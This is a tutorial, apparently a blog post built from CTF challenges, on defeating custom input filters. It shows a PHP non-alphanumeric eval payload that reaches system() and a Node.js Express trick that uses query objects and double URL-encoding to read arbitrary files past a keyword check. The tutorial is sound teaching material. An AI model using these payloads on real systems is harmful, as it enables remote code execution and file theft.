In this article, we are going to discuss input validation and how it can be exploited. This may get a little advanced for a beginner who hasn’t seen or developed a web application before, but I would still suggest reading it once. You will get an idea of what it is about and why, in the real world, it matters so much how we implement our own custom input validation mechanism.

There are many WAFs (web application firewalls) available nowadays; you may already know this if you own a website. Let me explain a WAF with an example that every bug hunter can relate to: on most websites, you get an error back when you send a simple cross-site scripting payload or some other malicious data. This happens because a WAF is blocking your hacking attempts. It typically uses regexes and payload lists and compares them against what the user requests. On a match, it redirects you to a page that says “Forbidden Request” or something similar.

But when you don’t have the money to buy a WAF, you try to implement one in your own code: you make sure a request is processed only when it looks normal (has no malicious payload). While doing so, it is possible that the developer leaves a loophole that an attacker can exploit, and that is what we are going to look at in this article. We will read the code of two such home-made filters and find a way around each. Both are approaches I came across in CTF challenges.

# 1

The first validation is implemented in PHP. Suppose you have an input field on a website and, in the backend, the following code checks your input.

<?php
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
  eval($_GET['shell']);
}
?>

`preg_match` performs a regular expression match.

We all know what the `eval` function does. Here, `preg_match` returns 1 if the GET parameter `shell` contains any letter or digit (the `i` flag makes the match case-insensitive). The NOT operator (`!`) then turns that into false, and `eval` never runs. So, in order to execute our input, we must make sure it doesn’t contain a single alphanumeric character. If we manage that, we have RCE.
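To get a feel for what the filter lets through, here is a small JavaScript sketch that mirrors the check. The regex is the one from the PHP snippet; the helper name `passesFilter` is made up for illustration and is not part of the challenge.

```javascript
// Mirrors the PHP condition: eval() only runs when NO letter or digit is present.
// `passesFilter` is a hypothetical helper name used only in this sketch.
function passesFilter(input) {
  return !/[a-z0-9]/is.test(input);
}

console.log(passesFilter("system('id');")); // false: contains letters
console.log(passesFilter("$_=[];"));        // true: only symbols and underscores
```

Anything that prints `true` here would reach `eval` in the PHP code.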

PHP lets you call a function through a variable: store the function name in a variable as a string and call that variable with parentheses.

php > $a="system";
php > $a('id');
uid=0(root) gid=0(root) groups=0(root)
php > 

If it’s still not clear, in simple words: I want to get `system('id')` into the `eval` function, and to do so it must contain no alphanumeric character. There is one non-alphanumeric character that is allowed in variable names: `_` (underscore). So we can use that one character repeatedly (_, __, ___, ____, etc.) to name variables.

The idea goes like this: I create a variable that holds an array. Converting an array to a string gives the word `Array`, so another variable can take its index 0 character, `A`. From there, we can just increment it to reach any letter we want.

Try this in your PHP shell.

php > $_=[];
php > echo $_;
PHP Warning:  Array to string conversion in php shell code on line 1
Array
php > 

`echo` prints `Array`, but with a warning. To suppress warnings and errors in PHP we can use the `@` operator.

php > echo @"$_";
Array
php > 

Now we can store it.

php > $_=@"$_";

Now we want index 0 of the `$_` variable. To do so we would have to write `0`, and we are not allowed to write any digit. To get around this, we can use a comparison operator: `'!'=='@'` is false, and false is cast to 0 when used as a string offset.

php > echo $_['!'=='@'];
PHP Warning:  String offset cast occurred in php shell code on line 1
A

Again, to suppress this warning we can use `@`, and then store the result back in the variable.

$_=@$_['!'=='@'];

Now we have `A` in the `$_` variable. We can use the increment operator to move from `A` to `Z`.

For example, if I want to create `SYSTEM` (PHP function names are case-insensitive, so this works just as well as `system`), I can start with the `S` like this.

$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;

When we want the next character (`Y`), we can create another variable named with one more underscore (_).

$___=$_;
$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;

We can do the same for the rest of the characters and later join all those variables using `.=` (PHP's concatenation assignment). As the argument to `system` we can pass `$_POST["CMD"]`, whose name can be built with the same technique. Symbols such as `$`, `[`, `]`, `.` and `"` are not matched by the filter, so they do no harm.
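Typing the increments by hand gets tedious, so here is a minimal JavaScript sketch that generates the PHP for a whole word. It only automates the steps shown above; the function name `buildPhpWord` and the choice of `$__` as scratch variable and `$___` as accumulator are my own assumptions, not something the challenge prescribes.

```javascript
// Sketch: emit PHP that spells an uppercase word without using letters or digits.
// `buildPhpWord` and the variable layout ($_, $__, $___) are illustrative choices.
function buildPhpWord(word) {
  if (!/^[A-Z]+$/.test(word)) {
    throw new Error("this sketch only handles A-Z");
  }
  // $_ ends up holding "A": the first character of the string "Array".
  let php = "$_=[];$_=@\"$_\";$_=@$_['!'=='@'];";
  php += "$___='';"; // $___ collects the finished word
  for (const ch of word) {
    const steps = ch.charCodeAt(0) - "A".charCodeAt(0);
    // Copy "A" into $__, bump it `steps` times, then append it to $___.
    php += "$__=$_;" + "$__++;".repeat(steps) + "$___.=$__;";
  }
  return php;
}

const payload = buildPhpWord("SYSTEM");
console.log(/[a-z0-9]/i.test(payload)); // false: nothing for the filter to catch
console.log(payload);
```

After the generated PHP runs, `$___` should hold the word, ready to be called as a function. The argument still has to be assembled the same way, because something like `'id'` contains letters too.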

Reference: https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/

# 2

The second technique I want to share is related to Node.js; I found it while reading a CTF walkthrough. Look at the code below and try to find a way to exploit it.

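const express = require("express");
const fs = require("fs");
const app = express();

// The WAF middleware has to be registered before the route;
// otherwise the route answers first and the check never runs.
app.use((req, res, next) => {
    if([req.body, req.headers, req.query].some(
        (item) => item && JSON.stringify(item).includes("flag")
    )) {
        return res.send("bad hacker!");
    }
    next();
});

app.get("/", (req, res) => {
    try {
        res.setHeader("Content-Type", "text/html");
        res.send(fs.readFileSync(req.query.file || "index.html").toString());
    }
    catch(err) {
        console.log(err);
        res.status(500).send("Internal server error");
    }
});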

Something has to be wrong with `req.query.file`, because it is the only input the user controls. Here is the thing about `req.query.<parameter>`: besides a simple string, it can also hold a list (array) or a dictionary (object) with keys and values, depending on how the query string is written. Here’s some code to see this for yourself; save it on your system and run it with the `node` command.

var express = require('express');
var app = express(); 
var PORT = 3000;
  
app.get('/profile', function (req, res) {
  console.log(req.query.name);
  res.send();
});
  
app.listen(PORT, function(err){
    if (err) console.log(err);
    console.log("Server listening on PORT", PORT);
});

Important – *npm install express*
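To make the list/dictionary behaviour concrete without starting a server, here is a stripped-down stand-in for bracket-style query parsing. Express 4 hands this job to the `qs` package by default; the `parseQuery` function below is NOT that library, just a simplified sketch that handles plain keys, `key[]` and `key[sub]`.

```javascript
// Simplified stand-in for bracket-style query parsing; NOT the real qs library.
// `parseQuery` is a hypothetical helper written only for this illustration.
function parseQuery(query) {
  const out = Object.create(null); // no prototype, so odd key names stay harmless
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const key = decodeURIComponent(eq === -1 ? pair : pair.slice(0, eq));
    const value = decodeURIComponent(eq === -1 ? "" : pair.slice(eq + 1));
    const m = /^([^\[\]]+)\[([^\[\]]*)\]$/.exec(key);
    if (!m) {
      out[key] = value; // name=abc -> string
      continue;
    }
    const [, name, sub] = m;
    if (sub === "") {
      // name[]=abc -> array
      if (!Array.isArray(out[name])) out[name] = [];
      out[name].push(value);
    } else {
      // name[first]=a -> object with keys
      const cur = out[name];
      if (typeof cur !== "object" || cur === null || Array.isArray(cur)) {
        out[name] = Object.create(null);
      }
      out[name][sub] = value;
    }
  }
  return out;
}

console.log(JSON.stringify(parseQuery("name=abc")));                   // {"name":"abc"}
console.log(JSON.stringify(parseQuery("name[]=abc")));                 // {"name":["abc"]}
console.log(JSON.stringify(parseQuery("name[first]=a&name[last]=b"))); // {"name":{"first":"a","last":"b"}}
```

The point is only the shape of the result: the same parameter name can arrive as a string, an array or an object, and the handler has to be ready for all three.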

If we add `fs.readFileSync(req.query.name)` to the code above and give the `name` parameter a list or a dictionary, we see the following output.

Server listening on PORT 3000
TypeError [ERR_INVALID_ARG_TYPE]: The "path" argument must be of type string or an instance of Buffer or URL. Received an instance of Array
    at Object.openSync (node:fs:577:10)
    at Object.readFileSync (node:fs:453:35)
    at /tmp/index.js:5:59
    at Layer.handle [as handle_request] (/tmp/node_modules/express/lib/router/layer.js:95:5)
    at next (/tmp/node_modules/express/lib/router/route.js:144:13)
    at Route.dispatch (/tmp/node_modules/express/lib/router/route.js:114:3)
    at Layer.handle [as handle_request] (/tmp/node_modules/express/lib/router/layer.js:95:5)
    at /tmp/node_modules/express/lib/router/index.js:284:15
    at Function.process_params (/tmp/node_modules/express/lib/router/index.js:346:12)
    at next (/tmp/node_modules/express/lib/router/index.js:280:10)

This is what I get when I run `curl 'localhost:3000/profile?name[]=abc'`. The error says `The "path" argument must be of type string or an instance of Buffer or URL. Received an instance of Array`, which means we are supposed to give it a string, a Buffer or a URL, not a list/array. Let’s quickly review the source code of `readFileSync`.

https://github.com/nodejs/node/blob/v18.x/lib/fs.js#L464

Going down the call stack with our path argument, we see that this happens:

readFileSync -> openSync -> getValidatedPath (in `internal/fs/utils.js`) -> toPathIfFileURL (in `internal/url.js`)

The first function, `readFileSync`, works out what to do with the file, reading or writing (`getOptions`). A few lines then check whether the given value is a file descriptor. This is done with a ternary operator whose false branch calls one more function, `fs.openSync(path, options.flag, 0o666);`. After that, `getValidatedPath` is called with our input, and it basically checks whether we gave it a URL or just a filename (`file:///etc/passwd` or `/etc/passwd`). If it is a URL, it converts it to a path with the `fileURLToPath` function, which errors out if the scheme is anything other than `file://`. Focus on the code below, condensed here to the part that matters.

function getValidatedPath (fileURLOrPath) {
  const path = fileURLOrPath != null && fileURLOrPath.href
      && fileURLOrPath.origin
    ? fileURLToPath(fileURLOrPath)
    : fileURLOrPath
  return path
}
Lines 2 and 3 treat the `fileURLOrPath` argument as a dictionary and try to read the values of its `href` and `origin` keys.
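A quick way to see what that means in practice is to pull the same truthiness test into a helper and feed it a few values. The name `looksLikeUrl` is made up for this sketch; the condition itself is the one from lines 2 and 3 of the snippet above.

```javascript
// Same truthiness test as in the snippet above, pulled into a helper.
// `looksLikeUrl` is a hypothetical name used only in this sketch.
function looksLikeUrl(value) {
  return Boolean(value != null && value.href && value.origin);
}

console.log(looksLikeUrl("/etc/passwd"));                 // false: strings have no href
console.log(looksLikeUrl(["abc"]));                       // false: arrays have no href
console.log(looksLikeUrl({ href: "x", origin: "x" }));    // true: a plain object is enough
console.log(looksLikeUrl(new URL("file:///etc/passwd"))); // true: the intended case
```

Nothing here verifies that the value is a real `URL` instance, only that two properties are present and truthy.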
Hmm, interesting, because ultimately we are the ones who set the value of `fileURLOrPath`, and as I said at the start, we can send a dictionary in the query. Now let’s get to the `fileURLToPath` function, which checks the OS. It is Linux, for obvious reasons (Windows sucks), so the `getPathFromURLPosix` function runs. Check out its code below.
function getPathFromURLPosix(url) {
  if (url.hostname !== '') {
    throw new ERR_INVALID_FILE_URL_HOST(platform);
  }
  const pathname = url.pathname;
  for (let n = 0; n < pathname.length; n++) {
    if (pathname[n] === '%') {
      const third = pathname.codePointAt(n + 2) | 0x20;
      if (pathname[n + 1] === '2' && third === 102) {
        throw new ERR_INVALID_FILE_URL_PATH(
          'must not include encoded / characters'
        );
      }
    }
  }
  return decodeURIComponent(pathname);
}

This code needs the value of the `pathname` key (again controlled by us), and `hostname` has to be an empty string or the function throws. The loop checks whether there is a URL-encoded `/` (`%2f`). The `| 0x20` applied to the third character sets the lowercase bit, so an uppercase `%2F` is caught as well. Other than that, every encoded character is accepted, and that may be all we need to bypass the WAF.
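The loop is easy to try out in isolation. Below is a re-statement of it with plain `Error` objects instead of Node's internal error classes, so it runs outside Node's internals; the name `decodePosixPath` and the sample paths are made up for this sketch.

```javascript
// Re-statement of the loop from getPathFromURLPosix with a plain Error,
// so it can run on its own. `decodePosixPath` is a made-up name.
function decodePosixPath(pathname) {
  for (let n = 0; n < pathname.length; n++) {
    if (pathname[n] === "%") {
      // OR-ing with 0x20 maps "F" (0x46) onto "f" (0x66 = 102).
      const third = pathname.codePointAt(n + 2) | 0x20;
      if (pathname[n + 1] === "2" && third === 102) {
        throw new Error("must not include encoded / characters");
      }
    }
  }
  return decodeURIComponent(pathname);
}

console.log(decodePosixPath("/tmp/%61bc")); // "/tmp/abc"
for (const blocked of ["/tmp%2fabc", "/tmp%2Fabc"]) {
  try {
    decodePosixPath(blocked);
  } catch (err) {
    console.log(blocked, "->", err.message);
  }
}
```

Both spellings of the encoded slash are rejected, while an encoded letter such as `%61` is decoded without complaint.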

var express = require('express');
var fs = require("fs");
var app = express();
var PORT = 3000;

app.get('/profile', function (req, res) {
  console.log(fs.readFileSync(req.query.name));
  res.send();
});

app.listen(PORT, function (err) {
  if (err) console.log(err);
  console.log("Server listening on PORT", PORT);
});

app.get("/file", (req, res) => {
    try {
        if([req.body, req.headers, req.query].some(
            (item) => item && JSON.stringify(item).includes("flag")
        )) {
            return res.send("bad hacker!");
        }
        res.setHeader("Content-Type", "text/html");
        res.send(fs.readFileSync(req.query.file || "index.html").toString());
    }
    catch(err) {
        console.log(err);
        res.status(500).send("Internal server error");
    }
});

Actually, we haven’t bypassed anything yet: the check for the `flag` keyword in the request is still there. We need to double URL-encode one or more characters of the word `flag`, because Express decodes the value once and the second decode happens inside `getPathFromURLPosix`. For example, `fl%2561g` becomes `fl%61g` after the first decode, which the WAF accepts, and `flag` after the second. And yes, that’s how you bypass this security implementation.
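The two decoding steps can be replayed in a few lines. This is only a sketch: the first `decodeURIComponent` call stands in for Express's query parsing, the file name `/flag.txt` is a hypothetical target, and `wafBlocks` is a made-up name wrapping the condition from the challenge code.

```javascript
// The WAF condition from the challenge, applied to an already-parsed query object.
// `wafBlocks` is a hypothetical helper name.
function wafBlocks(query) {
  return JSON.stringify(query).includes("flag");
}

// What goes on the wire (hypothetical file name) and what each layer sees.
const onTheWire = "/fl%2561g.txt";
const afterExpress = decodeURIComponent(onTheWire); // first decode, by the query parser
const afterNode = decodeURIComponent(afterExpress); // second decode, in getPathFromURLPosix

console.log(afterExpress);                                    // "/fl%61g.txt"
console.log(wafBlocks({ file: { pathname: afterExpress } })); // false: the WAF sees no "flag"
console.log(afterNode);                                       // "/flag.txt"

// Encoding only once is not enough: the WAF sees the decoded word.
const onceEncoded = decodeURIComponent("/fl%61g.txt");
console.log(wafBlocks({ file: { pathname: onceEncoded } }));  // true
```

The check and the file access simply look at the value at different stages of decoding, which is the whole bypass.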
Honestly, after working on this, I don’t think it is that difficult to read the source of a library. All you need to learn is the logic, and then it won’t matter whether you have worked with that language or framework before.
